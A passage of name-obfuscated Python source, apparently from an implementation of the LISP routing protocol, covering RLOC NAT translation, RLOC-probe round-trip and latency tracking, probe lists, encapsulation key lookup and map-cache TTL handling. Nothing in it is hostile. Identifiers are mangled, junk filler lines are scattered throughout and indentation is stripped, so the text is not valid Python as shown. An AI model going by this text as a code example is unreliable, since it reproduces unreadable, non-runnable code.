i1II11 = None if ( i1II11 == i1IiII ) else i1IiII
if ( i1II11 and i1II11 . timed_out ( ) ) :
O00oo0o0o0oo = i1II11 . port
o00oO = red ( i1II11 . address , False )
lprint ( ( " Youngest stored NAT state timed out " + " for RLOC {}:{}, {}" ) . format ( o00oO , O00oo0o0o0oo ,
# i11iIiiIii * i11iIiiIii
IiIi1 ) )
i1II11 = None
if 92 - 92: o0oOOo0O0Ooo + Oo0Ooo * OoOoOO00 * o0oOOo0O0Ooo
if 33 - 33: I1IiiI + O0 - I11i
if 90 - 90: I1Ii111 * OoooooooOO . iIii1I11I1II1 % OoO0O00 / I11i + iII111i
if 63 - 63: o0oOOo0O0Ooo . IiII . Oo0Ooo - iIii1I11I1II1 / I1Ii111
if 66 - 66: ooOoO0o * I1Ii111 - II111iiii
if 38 - 38: O0 % I1ii11iIi11i + O0
if 37 - 37: Oo0Ooo / I1IiiI
if ( i1II11 ) :
if ( i1II11 . address != Oo0o ) :
lprint ( "RLOC conflict, RLOC-record {}, NAT state {}" . format ( o00oO , red ( i1II11 . address , False ) ) )
if 23 - 23: II111iiii / iII111i
self . rloc . store_address ( i1II11 . address )
if 55 - 55: i11iIiiIii - Ii1I % OoooooooOO * OoooooooOO
o00oO = red ( i1II11 . address , False )
O00oo0o0o0oo = i1II11 . port
lprint ( " Use NAT translated RLOC {}:{} for {}" . format ( o00oO , O00oo0o0o0oo , IiIi1 ) )
if 92 - 92: iIii1I11I1II1
self . store_translated_rloc ( OooOOoOO0OO , O00oo0o0o0oo )
if 47 - 47: Oo0Ooo + Oo0Ooo * ooOoO0o - OoOoOO00 + II111iiii
if 10 - 10: II111iiii / ooOoO0o . Ii1I / I1Ii111 / oO0o
if 8 - 8: OOooOOo / ooOoO0o * I11i + OOooOOo * i1IIi
if 48 - 48: o0oOOo0O0Ooo - I1ii11iIi11i / iII111i
self . geo = rloc_record . geo
self . elp = rloc_record . elp
self . json = rloc_record . json
if 63 - 63: O0 - IiII . OOooOOo % IiII . I1IiiI / oO0o
if 79 - 79: OoOoOO00
if 88 - 88: oO0o * o0oOOo0O0Ooo
if 5 - 5: I11i - I1Ii111 * I11i - II111iiii + OOooOOo + II111iiii
self . rle = rloc_record . rle
if ( self . rle ) :
for IIIi11i1 in self . rle . rle_nodes :
oOo = IIIi11i1 . rloc_name
i1II11 = lisp_get_nat_info ( IIIi11i1 . address , oOo )
if ( i1II11 == None ) : continue
if 91 - 91: i1IIi + Oo0Ooo - I1ii11iIi11i + I1ii11iIi11i * O0 / O0
O00oo0o0o0oo = i1II11 . port
O0o0OO = oOo
if ( O0o0OO ) : O0o0OO = blue ( oOo , False )
if 78 - 78: OoooooooOO
lprint ( ( " Store translated encap-port {} for RLE-" + "node {}, rloc-name '{}'" ) . format ( O00oo0o0o0oo ,
# IiII
IIIi11i1 . address . print_address_no_iid ( ) , O0o0OO ) )
IIIi11i1 . translated_port = O00oo0o0o0oo
if 54 - 54: Oo0Ooo % O0 - OoooooooOO
if 80 - 80: Oo0Ooo - I1ii11iIi11i - iIii1I11I1II1 / iIii1I11I1II1 * i1IIi
if 59 - 59: I11i / Ii1I - i11iIiiIii + OoO0O00 . OOooOOo
self . priority = rloc_record . priority
self . mpriority = rloc_record . mpriority
self . weight = rloc_record . weight
self . mweight = rloc_record . mweight
if ( rloc_record . reach_bit and rloc_record . local_bit and
rloc_record . probe_bit == False ) : self . state = LISP_RLOC_UP_STATE
if 6 - 6: Ii1I . OoooooooOO / iII111i + o0oOOo0O0Ooo / II111iiii
if 28 - 28: OoO0O00 + I1IiiI / iII111i / OOooOOo + OoO0O00 * I1Ii111
if 76 - 76: I1IiiI . ooOoO0o
if 85 - 85: o0oOOo0O0Ooo + Oo0Ooo * I1ii11iIi11i
I1I1iI1Ii1I1I = source . is_exact_match ( rloc_record . rloc ) if source != None else None
if 10 - 10: OoooooooOO * iII111i * ooOoO0o . Ii1I % I1Ii111 / I1ii11iIi11i
if ( rloc_record . keys != None and I1I1iI1Ii1I1I ) :
III11II111 = rloc_record . keys [ 1 ]
if ( III11II111 != None ) :
Oo0o = rloc_record . rloc . print_address_no_iid ( ) + ":" + str ( O00oo0o0o0oo )
if 71 - 71: Ii1I + IiII
III11II111 . add_key_by_rloc ( Oo0o , True )
lprint ( " Store encap-keys for nonce 0x{}, RLOC {}" . format ( lisp_hex_string ( nonce ) , red ( Oo0o , False ) ) )
if 10 - 10: II111iiii % o0oOOo0O0Ooo . o0oOOo0O0Ooo % iII111i
if 2 - 2: OoooooooOO / IiII % Oo0Ooo % iIii1I11I1II1
if 62 - 62: oO0o
return ( O00oo0o0o0oo )
if 47 - 47: I1IiiI - O0 - I1ii11iIi11i . OoOoOO00
if 98 - 98: o0oOOo0O0Ooo - OoO0O00 . I1ii11iIi11i / OOooOOo
def store_translated_rloc ( self , rloc , port ) :
self . rloc . copy_address ( rloc )
self . translated_rloc . copy_address ( rloc )
self . translated_port = port
if 43 - 43: I1IiiI + OOooOOo + o0oOOo0O0Ooo
if 44 - 44: o0oOOo0O0Ooo % OoO0O00 . OoooooooOO
def is_rloc_translated ( self ) :
return ( self . translated_rloc . is_null ( ) == False )
if 21 - 21: Oo0Ooo * Oo0Ooo - iII111i - O0
if 87 - 87: OOooOOo / I1Ii111 - Ii1I + O0 - oO0o - O0
def rloc_exists ( self ) :
if ( self . rloc . is_null ( ) == False ) : return ( True )
if ( self . rle_name or self . geo_name or self . elp_name or self . json_name ) :
return ( False )
if 68 - 68: iII111i + II111iiii + I1ii11iIi11i * OOooOOo / oO0o
return ( True )
if 41 - 41: OOooOOo + Oo0Ooo % I1IiiI
if 3 - 3: ooOoO0o * Ii1I
def is_rtr ( self ) :
return ( ( self . priority == 254 and self . mpriority == 255 and self . weight == 0 and self . mweight == 0 ) )
if 29 - 29: OoooooooOO + OOooOOo
if 68 - 68: O0 + IiII / iII111i - OoOoOO00
if 5 - 5: I1IiiI * OoooooooOO - II111iiii
def print_state_change ( self , new_state ) :
o00O = self . print_state ( )
Oo0OOOOOOO0oo = "{} -> {}" . format ( o00O , new_state )
if ( new_state == "up" and self . unreach_state ( ) ) :
Oo0OOOOOOO0oo = bold ( Oo0OOOOOOO0oo , False )
if 68 - 68: iIii1I11I1II1 / II111iiii
return ( Oo0OOOOOOO0oo )
if 47 - 47: i11iIiiIii . OOooOOo + I1Ii111 / I1ii11iIi11i . I1IiiI . I1Ii111
if 79 - 79: OoO0O00 / i11iIiiIii . IiII - I11i / iIii1I11I1II1
def print_rloc_probe_rtt ( self ) :
if ( self . rloc_probe_rtt == - 1 ) : return ( "none" )
return ( self . rloc_probe_rtt )
if 81 - 81: Oo0Ooo . II111iiii + i11iIiiIii - OoOoOO00 * ooOoO0o
if 25 - 25: Ii1I / Oo0Ooo
def print_recent_rloc_probe_rtts ( self ) :
OOoOoooO0oOO = str ( self . recent_rloc_probe_rtts )
OOoOoooO0oOO = OOoOoooO0oOO . replace ( "-1" , "?" )
return ( OOoOoooO0oOO )
if 15 - 15: oO0o + O0
if 59 - 59: I1Ii111
def compute_rloc_probe_rtt ( self ) :
i1Ii = self . rloc_probe_rtt
self . rloc_probe_rtt = - 1
if ( self . last_rloc_probe_reply == None ) : return
if ( self . last_rloc_probe == None ) : return
self . rloc_probe_rtt = self . last_rloc_probe_reply - self . last_rloc_probe
self . rloc_probe_rtt = round ( self . rloc_probe_rtt , 3 )
oO0o0Oo0OO = self . recent_rloc_probe_rtts
self . recent_rloc_probe_rtts = [ i1Ii ] + oO0o0Oo0OO [ 0 : - 1 ]
if 72 - 72: I1ii11iIi11i - OoOoOO00 * I1Ii111 % i11iIiiIii + OOooOOo . IiII
if 31 - 31: i1IIi / i11iIiiIii
def print_rloc_probe_hops ( self ) :
return ( self . rloc_probe_hops )
if 96 - 96: iIii1I11I1II1 / i1IIi . OOooOOo + II111iiii
if 4 - 4: I1IiiI * I11i % i11iIiiIii . I1ii11iIi11i
def print_recent_rloc_probe_hops ( self ) :
IiIiiiIi = str ( self . recent_rloc_probe_hops )
return ( IiIiiiIi )
if 55 - 55: i11iIiiIii / ooOoO0o / Ii1I + Ii1I
if 14 - 14: IiII + I11i - o0oOOo0O0Ooo
def store_rloc_probe_hops ( self , to_hops , from_ttl ) :
if ( to_hops == 0 ) :
to_hops = "?"
elif ( to_hops < old_div ( LISP_RLOC_PROBE_TTL , 2 ) ) :
to_hops = "!"
else :
to_hops = str ( LISP_RLOC_PROBE_TTL - to_hops )
if 100 - 100: ooOoO0o
if ( from_ttl < old_div ( LISP_RLOC_PROBE_TTL , 2 ) ) :
IiIi1iiI1i = "!"
else :
IiIi1iiI1i = str ( LISP_RLOC_PROBE_TTL - from_ttl )
if 82 - 82: OoO0O00
if 96 - 96: OOooOOo
i1Ii = self . rloc_probe_hops
self . rloc_probe_hops = to_hops + "/" + IiIi1iiI1i
oO0o0Oo0OO = self . recent_rloc_probe_hops
self . recent_rloc_probe_hops = [ i1Ii ] + oO0o0Oo0OO [ 0 : - 1 ]
if 85 - 85: iIii1I11I1II1 + iII111i + iII111i - ooOoO0o * OoO0O00
if 80 - 80: i11iIiiIii / OOooOOo . OoooooooOO % I11i - iII111i * iIii1I11I1II1
def store_rloc_probe_latencies ( self , json_telemetry ) :
o0o0OO = lisp_decode_telemetry ( json_telemetry )
if 73 - 73: Oo0Ooo / OoooooooOO / i11iIiiIii
iiiIiiI11iI = round ( float ( o0o0OO [ "etr-in" ] ) - float ( o0o0OO [ "itr-out" ] ) , 3 )
IiIIi1 = round ( float ( o0o0OO [ "itr-in" ] ) - float ( o0o0OO [ "etr-out" ] ) , 3 )
if 18 - 18: OoOoOO00 * Ii1I
i1Ii = self . rloc_probe_latency
self . rloc_probe_latency = str ( iiiIiiI11iI ) + "/" + str ( IiIIi1 )
oO0o0Oo0OO = self . recent_rloc_probe_latencies
self . recent_rloc_probe_latencies = [ i1Ii ] + oO0o0Oo0OO [ 0 : - 1 ]
if 81 - 81: IiII . i11iIiiIii - I1IiiI * i11iIiiIii + OoO0O00
if 94 - 94: I1ii11iIi11i + OoO0O00 . II111iiii + oO0o . II111iiii
def print_rloc_probe_latency ( self ) :
return ( self . rloc_probe_latency )
if 96 - 96: i11iIiiIii
if 66 - 66: ooOoO0o * iII111i - iII111i - O0 . o0oOOo0O0Ooo
def print_recent_rloc_probe_latencies ( self ) :
Ii11 = str ( self . recent_rloc_probe_latencies )
return ( Ii11 )
if 15 - 15: IiII + I1ii11iIi11i - iIii1I11I1II1
if 13 - 13: Ii1I % IiII + i11iIiiIii . I1Ii111 * I11i
def process_rloc_probe_reply ( self , ts , nonce , eid , group , hc , ttl , jt ) :
OooOOoOO0OO = self
while ( True ) :
if ( OooOOoOO0OO . last_rloc_probe_nonce == nonce ) : break
OooOOoOO0OO = OooOOoOO0OO . next_rloc
if ( OooOOoOO0OO == None ) :
lprint ( " No matching nonce state found for nonce 0x{}" . format ( lisp_hex_string ( nonce ) ) )
if 37 - 37: iIii1I11I1II1
return
if 23 - 23: I11i % OOooOOo
if 43 - 43: oO0o + o0oOOo0O0Ooo . iII111i
if 14 - 14: i1IIi + OoOoOO00 * oO0o - II111iiii + IiII + OoOoOO00
if 42 - 42: Oo0Ooo + iII111i * ooOoO0o
if 72 - 72: iIii1I11I1II1 % I1Ii111
if 77 - 77: I1Ii111 * I1IiiI / iIii1I11I1II1 . II111iiii * Oo0Ooo
OooOOoOO0OO . last_rloc_probe_reply = ts
OooOOoOO0OO . compute_rloc_probe_rtt ( )
O00oo = OooOOoOO0OO . print_state_change ( "up" )
if ( OooOOoOO0OO . state != LISP_RLOC_UP_STATE ) :
lisp_update_rtr_updown ( OooOOoOO0OO . rloc , True )
OooOOoOO0OO . state = LISP_RLOC_UP_STATE
OooOOoOO0OO . last_state_change = lisp_get_timestamp ( )
I11 = lisp_map_cache . lookup_cache ( eid , True )
if ( I11 ) : lisp_write_ipc_map_cache ( True , I11 )
if 10 - 10: I1ii11iIi11i
if 20 - 20: O0 . iIii1I11I1II1 * I1ii11iIi11i - O0 + I1ii11iIi11i / I1IiiI
if 67 - 67: OoO0O00 / OoOoOO00 / i11iIiiIii % OoOoOO00
if 54 - 54: o0oOOo0O0Ooo . i11iIiiIii + I1IiiI * ooOoO0o - ooOoO0o
if 28 - 28: I1Ii111 . i11iIiiIii * oO0o % ooOoO0o / iII111i . OOooOOo
OooOOoOO0OO . store_rloc_probe_hops ( hc , ttl )
if 57 - 57: OoooooooOO . iIii1I11I1II1 % iII111i % Oo0Ooo
if 92 - 92: I1Ii111 - Ii1I + I1Ii111
if 8 - 8: Oo0Ooo . iII111i / i11iIiiIii + iIii1I11I1II1 - OoOoOO00
if 1 - 1: i11iIiiIii
if ( jt ) : OooOOoOO0OO . store_rloc_probe_latencies ( jt )
if 25 - 25: OoooooooOO / II111iiii . OOooOOo * OoOoOO00 - OoooooooOO
I1IO0O00o0oo0oO = bold ( "RLOC-probe reply" , False )
Oo0o = OooOOoOO0OO . rloc . print_address_no_iid ( )
i1o0 = bold ( str ( OooOOoOO0OO . print_rloc_probe_rtt ( ) ) , False )
o00oo = ":{}" . format ( self . translated_port ) if self . translated_port != 0 else ""
if 86 - 86: OoOoOO00 + iIii1I11I1II1 / OoOoOO00 + Oo0Ooo / Ii1I - II111iiii
ooOoOoO00OO0oooo = ""
if ( OooOOoOO0OO . rloc_next_hop != None ) :
iiIi , iIIIio000 = OooOOoOO0OO . rloc_next_hop
ooOoOoO00OO0oooo = ", nh {}({})" . format ( iIIIio000 , iiIi )
if 90 - 90: I11i / Oo0Ooo
if 70 - 70: oO0o
o0OO0 = bold ( OooOOoOO0OO . print_rloc_probe_latency ( ) , False )
o0OO0 = ", latency {}" . format ( o0OO0 ) if jt else ""
if 97 - 97: ooOoO0o % i1IIi . IiII / Oo0Ooo . I1Ii111 . OoO0O00
I1i = green ( lisp_print_eid_tuple ( eid , group ) , False )
if 12 - 12: I1IiiI
lprint ( ( " Received {} from {}{} for {}, {}, rtt {}{}, " + "to-ttl/from-ttl {}{}" ) . format ( I1IO0O00o0oo0oO , red ( Oo0o , False ) , o00oo , I1i ,
# I1ii11iIi11i / OoOoOO00 / i1IIi / i11iIiiIii * iIii1I11I1II1 / i1IIi
O00oo , i1o0 , ooOoOoO00OO0oooo , str ( hc ) + "/" + str ( ttl ) , o0OO0 ) )
if 69 - 69: OOooOOo / I1Ii111 * II111iiii
if ( OooOOoOO0OO . rloc_next_hop == None ) : return
if 88 - 88: OOooOOo - I1IiiI + Oo0Ooo
if 15 - 15: I11i / I1ii11iIi11i - I1Ii111 * O0 % ooOoO0o / I1IiiI
if 53 - 53: i11iIiiIii * i11iIiiIii % O0 % IiII
if 57 - 57: I1IiiI % i1IIi * OoO0O00 + I1Ii111 . I11i % I11i
OooOOoOO0OO = None
oOOO = None
while ( True ) :
OooOOoOO0OO = self if OooOOoOO0OO == None else OooOOoOO0OO . next_rloc
if ( OooOOoOO0OO == None ) : break
if ( OooOOoOO0OO . up_state ( ) == False ) : continue
if ( OooOOoOO0OO . rloc_probe_rtt == - 1 ) : continue
if 12 - 12: O0
if ( oOOO == None ) : oOOO = OooOOoOO0OO
if ( OooOOoOO0OO . rloc_probe_rtt < oOOO . rloc_probe_rtt ) : oOOO = OooOOoOO0OO
if 20 - 20: Ii1I - oO0o / OoooooooOO - OoooooooOO + iII111i
if 78 - 78: o0oOOo0O0Ooo - IiII % oO0o + i11iIiiIii % I1ii11iIi11i . OoOoOO00
if ( oOOO != None ) :
iiIi , iIIIio000 = oOOO . rloc_next_hop
ooOoOoO00OO0oooo = bold ( "nh {}({})" . format ( iIIIio000 , iiIi ) , False )
lprint ( " Install host-route via best {}" . format ( ooOoOoO00OO0oooo ) )
lisp_install_host_route ( Oo0o , None , False )
lisp_install_host_route ( Oo0o , iIIIio000 , True )
if 31 - 31: II111iiii . i1IIi . OoOoOO00
if 98 - 98: iII111i
if 80 - 80: I1Ii111 % i1IIi
def add_to_rloc_probe_list ( self , eid , group ) :
Oo0o = self . rloc . print_address_no_iid ( )
O00oo0o0o0oo = self . translated_port
if ( O00oo0o0o0oo != 0 ) : Oo0o += ":" + str ( O00oo0o0o0oo )
if 33 - 33: o0oOOo0O0Ooo
if ( Oo0o not in lisp_rloc_probe_list ) :
lisp_rloc_probe_list [ Oo0o ] = [ ]
if 32 - 32: Ii1I / iII111i - Oo0Ooo % iIii1I11I1II1 + OoO0O00
if 55 - 55: oO0o
if ( group . is_null ( ) ) : group . instance_id = 0
for I1I1iIiiiiII11 , I1i , o0O0Ooo in lisp_rloc_probe_list [ Oo0o ] :
if ( I1i . is_exact_match ( eid ) and o0O0Ooo . is_exact_match ( group ) ) :
if ( I1I1iIiiiiII11 == self ) :
if ( lisp_rloc_probe_list [ Oo0o ] == [ ] ) :
lisp_rloc_probe_list . pop ( Oo0o )
if 60 - 60: OOooOOo + OOooOOo - Ii1I / iII111i
return
if 42 - 42: IiII % oO0o - o0oOOo0O0Ooo * iII111i - Oo0Ooo
lisp_rloc_probe_list [ Oo0o ] . remove ( [ I1I1iIiiiiII11 , I1i , o0O0Ooo ] )
break
if 19 - 19: I1IiiI - iII111i - oO0o / II111iiii
if 98 - 98: IiII * OoOoOO00
lisp_rloc_probe_list [ Oo0o ] . append ( [ self , eid , group ] )
if 13 - 13: O0 + oO0o - iIii1I11I1II1 - Oo0Ooo % I1IiiI
if 45 - 45: O0
if 55 - 55: i11iIiiIii * Ii1I % OOooOOo + ooOoO0o - I1ii11iIi11i . Oo0Ooo
if 48 - 48: o0oOOo0O0Ooo
if 55 - 55: OOooOOo - OoooooooOO * iIii1I11I1II1 + iII111i % II111iiii
OooOOoOO0OO = lisp_rloc_probe_list [ Oo0o ] [ 0 ] [ 0 ]
if ( OooOOoOO0OO . state == LISP_RLOC_UNREACH_STATE ) :
self . state = LISP_RLOC_UNREACH_STATE
self . last_state_change = lisp_get_timestamp ( )
if 33 - 33: I1Ii111 * oO0o * OoooooooOO + OOooOOo - I1IiiI + I1Ii111
if 92 - 92: ooOoO0o * I11i % iIii1I11I1II1 + Ii1I - OoOoOO00
if 31 - 31: OoooooooOO
def delete_from_rloc_probe_list ( self , eid , group ) :
Oo0o = self . rloc . print_address_no_iid ( )
O00oo0o0o0oo = self . translated_port
if ( O00oo0o0o0oo != 0 ) : Oo0o += ":" + str ( O00oo0o0o0oo )
if ( Oo0o not in lisp_rloc_probe_list ) : return
if 87 - 87: OoooooooOO - Ii1I . I11i / I1Ii111 . i1IIi
oo0OOoO000O0OoOO = [ ]
for iIiiI11II11i in lisp_rloc_probe_list [ Oo0o ] :
if ( iIiiI11II11i [ 0 ] != self ) : continue
if ( iIiiI11II11i [ 1 ] . is_exact_match ( eid ) == False ) : continue
if ( iIiiI11II11i [ 2 ] . is_exact_match ( group ) == False ) : continue
oo0OOoO000O0OoOO = iIiiI11II11i
break
if 47 - 47: I1ii11iIi11i % Ii1I
if ( oo0OOoO000O0OoOO == [ ] ) : return
if 57 - 57: o0oOOo0O0Ooo - I1Ii111 / OoooooooOO . OoooooooOO
try :
lisp_rloc_probe_list [ Oo0o ] . remove ( oo0OOoO000O0OoOO )
if ( lisp_rloc_probe_list [ Oo0o ] == [ ] ) :
lisp_rloc_probe_list . pop ( Oo0o )
if 44 - 44: oO0o / II111iiii % I1IiiI - II111iiii / OoooooooOO
except :
return
if 4 - 4: I11i * OoOoOO00
if 18 - 18: iIii1I11I1II1 % OOooOOo - I1ii11iIi11i * i1IIi + Oo0Ooo
if 87 - 87: oO0o . I11i
def print_rloc_probe_state ( self , trailing_linefeed ) :
OoiIIIiIi1I1i = ""
OooOOoOO0OO = self
while ( True ) :
iII1I11II = OooOOoOO0OO . last_rloc_probe
if ( iII1I11II == None ) : iII1I11II = 0
Ii1i11I1i = OooOOoOO0OO . last_rloc_probe_reply
if ( Ii1i11I1i == None ) : Ii1i11I1i = 0
i1o0 = OooOOoOO0OO . print_rloc_probe_rtt ( )
I1iiIi111I = space ( 4 )
if 56 - 56: iII111i + oO0o . i1IIi
if ( OooOOoOO0OO . rloc_next_hop == None ) :
OoiIIIiIi1I1i += "RLOC-Probing:\n"
else :
iiIi , iIIIio000 = OooOOoOO0OO . rloc_next_hop
OoiIIIiIi1I1i += "RLOC-Probing for nh {}({}):\n" . format ( iIIIio000 , iiIi )
if 40 - 40: OOooOOo - Oo0Ooo . iII111i - I1IiiI % I1Ii111 - i11iIiiIii
if 23 - 23: I1ii11iIi11i - I1IiiI / o0oOOo0O0Ooo / I11i + OoO0O00
OoiIIIiIi1I1i += ( "{}RLOC-probe request sent: {}\n{}RLOC-probe reply " + "received: {}, rtt {}" ) . format ( I1iiIi111I , lisp_print_elapsed ( iII1I11II ) ,
# O0 * II111iiii / i11iIiiIii
I1iiIi111I , lisp_print_elapsed ( Ii1i11I1i ) , i1o0 )
if 38 - 38: OoooooooOO % i11iIiiIii - O0 / O0
if ( trailing_linefeed ) : OoiIIIiIi1I1i += "\n"
if 59 - 59: OoO0O00 % iII111i + oO0o * II111iiii . OOooOOo
OooOOoOO0OO = OooOOoOO0OO . next_rloc
if ( OooOOoOO0OO == None ) : break
OoiIIIiIi1I1i += "\n"
if 26 - 26: OOooOOo % OoooooooOO . Ii1I / iIii1I11I1II1 * I1IiiI
return ( OoiIIIiIi1I1i )
if 85 - 85: IiII / Ii1I - I1ii11iIi11i * OOooOOo
if 19 - 19: I1ii11iIi11i
def get_encap_keys ( self ) :
O00oo0o0o0oo = "4341" if self . translated_port == 0 else str ( self . translated_port )
if 12 - 12: ooOoO0o * I1ii11iIi11i * O0 / oO0o + iII111i - iIii1I11I1II1
Oo0o = self . rloc . print_address_no_iid ( ) + ":" + O00oo0o0o0oo
if 81 - 81: Ii1I
try :
O0o0O0 = lisp_crypto_keys_by_rloc_encap [ Oo0o ]
if ( O0o0O0 [ 1 ] ) : return ( O0o0O0 [ 1 ] . encrypt_key , O0o0O0 [ 1 ] . icv_key )
return ( None , None )
except :
return ( None , None )
if 87 - 87: O0 % iII111i
if 57 - 57: Ii1I
if 49 - 49: I11i
def rloc_recent_rekey ( self ) :
O00oo0o0o0oo = "4341" if self . translated_port == 0 else str ( self . translated_port )
if 22 - 22: Oo0Ooo % OOooOOo + O0 - OoO0O00 % I11i * O0
Oo0o = self . rloc . print_address_no_iid ( ) + ":" + O00oo0o0o0oo
if 42 - 42: O0
try :
III11II111 = lisp_crypto_keys_by_rloc_encap [ Oo0o ] [ 1 ]
if ( III11II111 == None ) : return ( False )
if ( III11II111 . last_rekey == None ) : return ( True )
return ( time . time ( ) - III11II111 . last_rekey < 1 )
except :
return ( False )
if 55 - 55: i11iIiiIii % OOooOOo
if 10 - 10: OoOoOO00 / i11iIiiIii
if 21 - 21: Ii1I - i1IIi / I11i + IiII
if 44 - 44: OoooooooOO % I11i / O0
class lisp_mapping ( object ) :
def __init__ ( self , eid , group , rloc_set ) :
self . eid = eid
if ( eid == "" ) : self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = group
if ( group == "" ) : self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . rloc_set = rloc_set
self . best_rloc_set = [ ]
self . build_best_rloc_set ( )
self . uptime = lisp_get_timestamp ( )
self . action = LISP_NO_ACTION
self . expires = None
self . map_cache_ttl = None
self . register_ttl = LISP_REGISTER_TTL
self . last_refresh_time = self . uptime
self . source_cache = None
self . map_replies_sent = 0
self . mapping_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . use_mr_name = "all"
self . use_ms_name = "all"
self . stats = lisp_stats ( )
self . dynamic_eids = None
self . checkpoint_entry = False
self . secondary_iid = None
self . signature_eid = False
self . gleaned = False
self . recent_sources = { }
self . last_multicast_map_request = 0
self . subscribed_eid = None
self . subscribed_group = None
if 94 - 94: IiII
if 83 - 83: OoO0O00
def print_mapping ( self , eid_indent , rloc_indent ) :
i1 = lisp_print_elapsed ( self . uptime )
o0o0o = "" if self . group . is_null ( ) else ", group {}" . format ( self . group . print_prefix ( ) )
if 55 - 55: iII111i
lprint ( "{}eid {}{}, uptime {}, {} rlocs:" . format ( eid_indent ,
green ( self . eid . print_prefix ( ) , False ) , o0o0o , i1 ,
len ( self . rloc_set ) ) )
for OooOOoOO0OO in self . rloc_set : OooOOoOO0OO . print_rloc ( rloc_indent )
if 37 - 37: oO0o / o0oOOo0O0Ooo + I11i * OoO0O00 * o0oOOo0O0Ooo
if 33 - 33: I1Ii111
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 97 - 97: Ii1I / iII111i - ooOoO0o + IiII * OoOoOO00 - OOooOOo
if 43 - 43: oO0o / II111iiii - iII111i / oO0o
def print_ttl ( self ) :
O0O00O = self . map_cache_ttl
if ( O0O00O == None ) : return ( "forever" )
if 98 - 98: OoOoOO00 / OOooOOo
if ( O0O00O >= 3600 ) :
if ( ( O0O00O % 3600 ) == 0 ) :
O0O00O = str ( old_div ( O0O00O , 3600 ) ) + " hours"
else :
O0O00O = str ( O0O00O * 60 ) + " mins"
if 31 - 31: II111iiii % I11i - I11i
elif ( O0O00O >= 60 ) :
if ( ( O0O00O % 60 ) == 0 ) :
O0O00O = str ( old_div ( O0O00O , 60 ) ) + " mins"
else :
O0O00O = str ( O0O00O ) + " secs"
if 17 - 17: iII111i . IiII + OOooOOo % I1Ii111 % i11iIiiIii
else :
O0O00O = str ( O0O00O ) + " secs"
if 100 - 100: i11iIiiIii - O0 . OoO0O00 / O0 - Ii1I - IiII
return ( O0O00O )
if 72 - 72: Ii1I % O0 + II111iiii . i11iIiiIii
if 66 - 66: II111iiii % I1IiiI
def refresh ( self ) :
if ( self . group . is_null ( ) ) : return ( self . refresh_unicast ( ) )
return ( self . refresh_multicast ( ) )
if 88 - 88: iIii1I11I1II1 * iIii1I11I1II1 + I1Ii111 * OOooOOo . I1IiiI
if 96 - 96: I1ii11iIi11i
def refresh_unicast ( self ) :
return ( self . is_active ( ) and self . has_ttl_elapsed ( ) and
self . gleaned == False )
if 37 - 37: OoO0O00 % o0oOOo0O0Ooo * O0 * O0 + iII111i
if 18 - 18: i11iIiiIii . o0oOOo0O0Ooo - OOooOOo % oO0o * Ii1I / I1IiiI
def refresh_multicast ( self ) :
if 46 - 46: o0oOOo0O0Ooo . ooOoO0o / Ii1I
if 97 - 97: Ii1I . Oo0Ooo - O0 - I1Ii111 . i1IIi
if 47 - 47: IiII * ooOoO0o - i1IIi % OoOoOO00 * i11iIiiIii . OoooooooOO
if 84 - 84: OoOoOO00 / IiII - i1IIi - I1IiiI * OOooOOo
if 35 - 35: II111iiii
Ii1i1 = int ( ( time . time ( ) - self . uptime ) % self . map_cache_ttl )
I1I1iI1 = ( Ii1i1 in [ 0 , 1 , 2 ] )
if ( I1I1iI1 == False ) : return ( False )
if 82 - 82: ooOoO0o - ooOoO0o . Ii1I . i11iIiiIii % Ii1I + OOooOOo
if 33 - 33: Oo0Ooo - OOooOOo / OoOoOO00 % II111iiii % OOooOOo + I1Ii111
if 41 - 41: I11i + Oo0Ooo . Oo0Ooo / iII111i . OoOoOO00
if 1 - 1: ooOoO0o + iII111i % i11iIiiIii / OoOoOO00
o000oO0O0ooo = ( ( time . time ( ) - self . last_multicast_map_request ) <= 2 )
if ( o000oO0O0ooo ) : return ( False )
if 57 - 57: iII111i
self . last_multicast_map_request = lisp_get_timestamp ( )
return ( True )
if 18 - 18: II111iiii % i11iIiiIii + I11i - OOooOOo
if 100 - 100: o0oOOo0O0Ooo / Ii1I - iIii1I11I1II1 / oO0o
def has_ttl_elapsed ( self ) :
if ( self . map_cache_ttl == None ) : return ( False )
Ii1i1 = time . time ( ) - self . last_refresh_time
if ( Ii1i1 >= self . map_cache_ttl ) : return ( True )
if 68 - 68: I11i / II111iiii * oO0o . II111iiii * OOooOOo
if 78 - 78: I11i * OoO0O00 / II111iiii
if 86 - 86: I1Ii111 % II111iiii
if 90 - 90: OoO0O00 / I11i - Oo0Ooo
if 76 - 76: O0 + OoO0O00 / ooOoO0o . II111iiii * iIii1I11I1II1 . I1Ii111
II1I1I = self . map_cache_ttl - ( old_div ( self . map_cache_ttl , 10 ) )
if ( Ii1i1 >= II1I1I ) : return ( True )
return ( False )
if 33 - 33: iIii1I11I1II1 . I1ii11iIi11i - O0 - IiII
if 51 - 51: OoooooooOO . I1IiiI . i11iIiiIii
def is_active ( self ) :
if ( self . stats . last_increment == None ) : return ( False )
Ii1i1 = time . time ( ) - self . stats . last_increment
return ( Ii1i1 <= 60 )
if 76 - 76: OoOoOO00 + iII111i . ooOoO0o + OoO0O00 + I1IiiI / IiII
if 70 - 70: O0 * i11iIiiIii / Ii1I - II111iiii / O0
def match_eid_tuple ( self , db ) :
if ( self . eid . is_exact_match ( db . eid ) == False ) : return ( False )
if ( self . group . is_exact_match ( db . group ) == False ) : return ( False )
return ( True )
if 30 - 30: IiII . I1ii11iIi11i % ooOoO0o
if 15 - 15: oO0o
def sort_rloc_set ( self ) :
self . rloc_set . sort ( key = operator . attrgetter ( 'rloc.address' ) )
if 86 - 86: O0
if 13 - 13: I1ii11iIi11i . IiII - I11i
def delete_rlocs_from_rloc_probe_list ( self ) :
for OooOOoOO0OO in self . best_rloc_set :
OooOOoOO0OO . delete_from_rloc_probe_list ( self . eid , self . group )
if 81 - 81: i11iIiiIii
if 7 - 7: IiII - OoOoOO00 * i1IIi
if 14 - 14: I1ii11iIi11i . OoO0O00
def build_best_rloc_set ( self ) :
I1i1 = self . best_rloc_set
self . best_rloc_set = [ ]
if ( self . rloc_set == None ) : return
if 25 - 25: Oo0Ooo . I1ii11iIi11i * OOooOOo
if 25 - 25: IiII % I1IiiI / O0 % OOooOOo - OoooooooOO
if 29 - 29: O0 + iII111i
